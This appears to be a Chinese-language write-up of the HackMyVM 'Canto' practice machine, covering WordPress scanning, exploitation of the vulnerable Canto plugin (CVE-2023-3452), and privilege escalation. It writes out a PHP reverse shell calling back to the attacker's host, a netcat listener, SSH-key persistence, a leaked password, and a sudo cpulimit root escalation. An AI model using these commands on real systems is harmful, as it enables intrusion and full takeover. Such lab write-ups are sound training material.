Canto - hackmyvm

简介

靶机名称：Canto

难度：简单

靶场地址：https://hackmyvm.eu/machines/machine.php?vm=Canto

本地环境

虚拟机：vitual box

靶场IP（Canto）：192.168.130.53

windows_IP：192.168.130.158

kali_IP：192.168.130.166

扫描

nmap起手

nmap -sT -p0- 192.168.130.53 -oA nmapscan/ports ;ports=$(grep open ./nmapscan/ports.nmap | awk -F '/' '{print $1}' | paste -sd ',');echo $ports >> nmapscan/tcp_ports;
sudo nmap -sT -sV -sC -O -p$ports 192.168.130.53/32 -oA nmapscan/detail

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-01 05:55 EDT
Nmap scan report for canto.lan (192.168.130.53)
Host is up (0.00084s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.3p1 Ubuntu 1ubuntu3.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 c6:af:18:21:fa:3f:3c:fc:9f:e4:ef:04:c9:16:cb:c7 (ECDSA)
|_  256 ba:0e:8f:0b:24:20:dc:75:b7:1b:04:a1:81:b6:6d:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.57 ((Ubuntu))
|_http-generator: WordPress 6.5.3
|_http-server-header: Apache/2.4.57 (Ubuntu)
|_http-title: Canto
MAC Address: 08:00:27:73:D7:34 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.95 seconds

HTTP

框架是wordpress，直接wpscan先试试

wpscan --url http://192.168.130.53/ --plugins-detection aggressive -e u,ap --api-token=Vjt...

_________________________________________________________________          _______   _____\ \        / /  __ \ / ____|\ \  /\  / /| |__) | (___   ___  __ _ _ __ ®\ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \\  /\  /  | |     ____) | (__| (_| | | | |\/  \/   |_|    |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan TeamVersion 3.8.25Sponsored by Automattic - https://automattic.com/@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[+] URL: http://192.168.130.53/ [192.168.130.53]
[+] Started: Thu Aug  1 09:23:25 2024Interesting Finding(s):[+] Headers| Interesting Entry: Server: Apache/2.4.57 (Ubuntu)| Found By: Headers (Passive Detection)| Confidence: 100%[+] XML-RPC seems to be enabled: http://192.168.130.53/xmlrpc.php| Found By: Direct Access (Aggressive Detection)| Confidence: 100%| References:|  - http://codex.wordpress.org/XML-RPC_Pingback_API|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/|  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/[+] WordPress readme found: http://192.168.130.53/readme.html| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] Upload directory has listing enabled: http://192.168.130.53/wp-content/uploads/| Found By: Direct Access (Aggressive Detection)| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://192.168.130.53/wp-cron.php| Found By: Direct Access (Aggressive Detection)| Confidence: 60%| References:|  - https://www.iplocation.net/defend-wordpress-from-ddos|  - https://github.com/wpscanteam/wpscan/issues/1299Fingerprinting the version - Time: 00:00:02 <==========> (702 / 702) 100.00% Time: 00:00:02
[i] The WordPress version could not be detected.[+] WordPress theme in use: twentytwentyfour| Location: http://192.168.130.53/wp-content/themes/twentytwentyfour/| Last Updated: 2024-07-16T00:00:00.000Z| Readme: http://192.168.130.53/wp-content/themes/twentytwentyfour/readme.txt| [!] The version is out of date, the latest version is 1.2| [!] Directory listing is enabled| Style URL: http://192.168.130.53/wp-content/themes/twentytwentyfour/style.css| Style Name: Twenty Twenty-Four| Style URI: https://wordpress.org/themes/twentytwentyfour/| Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...| Author: the WordPress team| Author URI: https://wordpress.org|| Found By: Urls In Homepage (Passive Detection)|| Version: 1.1 (80% confidence)| Found By: Style (Passive Detection)|  - http://192.168.130.53/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.1'[+] Enumerating All Plugins (via Aggressive Methods)Checking Known Locations - Time: 00:01:04 <=====> (106191 / 106191) 100.00% Time: 00:01:04
[+] Checking Plugin Versions (via Passive and Aggressive Methods)[i] Plugin(s) Identified:[+] akismet| Location: http://192.168.130.53/wp-content/plugins/akismet/| Last Updated: 2024-07-10T22:16:00.000Z| Readme: http://192.168.130.53/wp-content/plugins/akismet/readme.txt| [!] The version is out of date, the latest version is 5.3.3|| Found By: Known Locations (Aggressive Detection)|  - http://192.168.130.53/wp-content/plugins/akismet/, status: 200|| Version: 5.3.2 (100% confidence)| Found By: Readme - Stable Tag (Aggressive Detection)|  - http://192.168.130.53/wp-content/plugins/akismet/readme.txt| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)|  - http://192.168.130.53/wp-content/plugins/akismet/readme.txt[+] canto| Location: http://192.168.130.53/wp-content/plugins/canto/| Last Updated: 2024-07-17T04:18:00.000Z| Readme: http://192.168.130.53/wp-content/plugins/canto/readme.txt| [!] The version is out of date, the latest version is 3.0.9|| Found By: Known Locations (Aggressive Detection)|  - http://192.168.130.53/wp-content/plugins/canto/, status: 200|| [!] 4 vulnerabilities identified:|| [!] Title: Canto <= 3.0.8 - Unauthenticated Blind SSRF|     References:|      - https://wpscan.com/vulnerability/29c89cc9-ad9f-4086-a762-8896eba031c6|      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28976|      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28977|      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28978|      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24063|      - https://gist.github.com/p4nk4jv/87aebd999ce4b28063943480e95fd9e0|| [!] Title: Canto < 3.0.5 - Unauthenticated Remote File Inclusion|     Fixed in: 3.0.5|     References:|      - https://wpscan.com/vulnerability/9e2817c7-d4aa-4ed9-a3d7-18f3117ed810|      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3452|| [!] Title: Canto < 3.0.7 - Unauthenticated RCE|     Fixed in: 3.0.7|     References:|      - https://wpscan.com/vulnerability/1595af73-6f97-4bc9-9cb2-14a55daaa2d4|      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25096|      - https://patchstack.com/database/vulnerability/canto/wordpress-canto-plugin-3-0-6-unauthenticated-remote-code-execution-rce-vulnerability|| [!] Title: Canto < 3.0.9 - Unauthenticated Remote File Inclusion|     Fixed in: 3.0.9|     References:|      - https://wpscan.com/vulnerability/3ea53721-bdf6-4203-b6bc-2565d6283159|      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4936|      - https://www.wordfence.com/threat-intel/vulnerabilities/id/95a68ae0-36da-499b-a09d-4c91db8aa338|| Version: 3.0.4 (100% confidence)| Found By: Readme - Stable Tag (Aggressive Detection)|  - http://192.168.130.53/wp-content/plugins/canto/readme.txt| Confirmed By: Composer File (Aggressive Detection)|  - http://192.168.130.53/wp-content/plugins/canto/package.json, Match: '3.0.4'[+] Enumerating Users (via Passive and Aggressive Methods)Brute Forcing Author IDs - Time: 00:00:00 <=============> (10 / 10) 100.00% Time: 00:00:00[i] User(s) Identified:[+] erik| Found By: Rss Generator (Passive Detection)| Confirmed By:|  Wp Json Api (Aggressive Detection)|   - http://192.168.130.53/index.php/wp-json/wp/v2/users/?per_page=100&page=1|  Author Id Brute Forcing - Author Pattern (Aggressive Detection)|  Login Error Messages (Aggressive Detection)[+] WPScan DB API OK| Plan: free| Requests Done (during the scan): 3| Requests Remaining: 21

可以看到canto插件有漏洞，searchsplolit找一下

那就没什么好说的了，直接打poc

CVE-2023-3452

https://github.com/leoanggal1/CVE-2023-3452-PoC

先准备一个反弹shell的php文件

<?php system("bash -c 'sh -i >& /dev/tcp/192.168.130.166/40000 0>&1'");?> 

然后起个监听

 rlwrap -cAr nc -lvvp 40000

最后poc打过去就好了

python3 CVE-2023-3452.py -u http://192.168.130.53 -LHOST 192.168.130.166  -s ./shell.php

提权

备份

在/var/wordpress/backups路径下找到账密备份文件

www-data@canto:/var/wordpress/backups$ su erik
su erik
Password: th1sIsTheP3ssw0rd!erik@canto:/var/wordpress/backups$ cd
cd
erik@canto:~$ ls
ls
notes  user.txt
erik@canto:~$ id
id
uid=1001(erik) gid=1001(erik) groups=1001(erik)

提权成功，拿到user.txt

顺手把公钥传上去维权

erik@canto:~$ ssh-keygen
ssh-keygen
Generating public/private rsa key pair.
...
erik@canto:~/.ssh$ echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK5sWbMpzoFOhxwVIjKUYvvMce5kR6XSmnTp7u2TlCmW kali@kali" > authorized_keys

sudo提权

sudo -l查看权限

erik@canto:/$ sudo -l
Matching Defaults entries for erik on canto:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,use_ptyUser erik may run the following commands on canto:(ALL : ALL) NOPASSWD: /usr/bin/cpulimit

GTFOBINS有一键提权方案

erik@canto:/$ sudo /usr/bin/cpulimit -l 100 -f /bin/bash
Process 3024 detected
root@canto:/# cd
root@canto:~# id
uid=0(root) gid=0(root) groups=0(root)
root@canto:~# ls
root.txt  snap

结束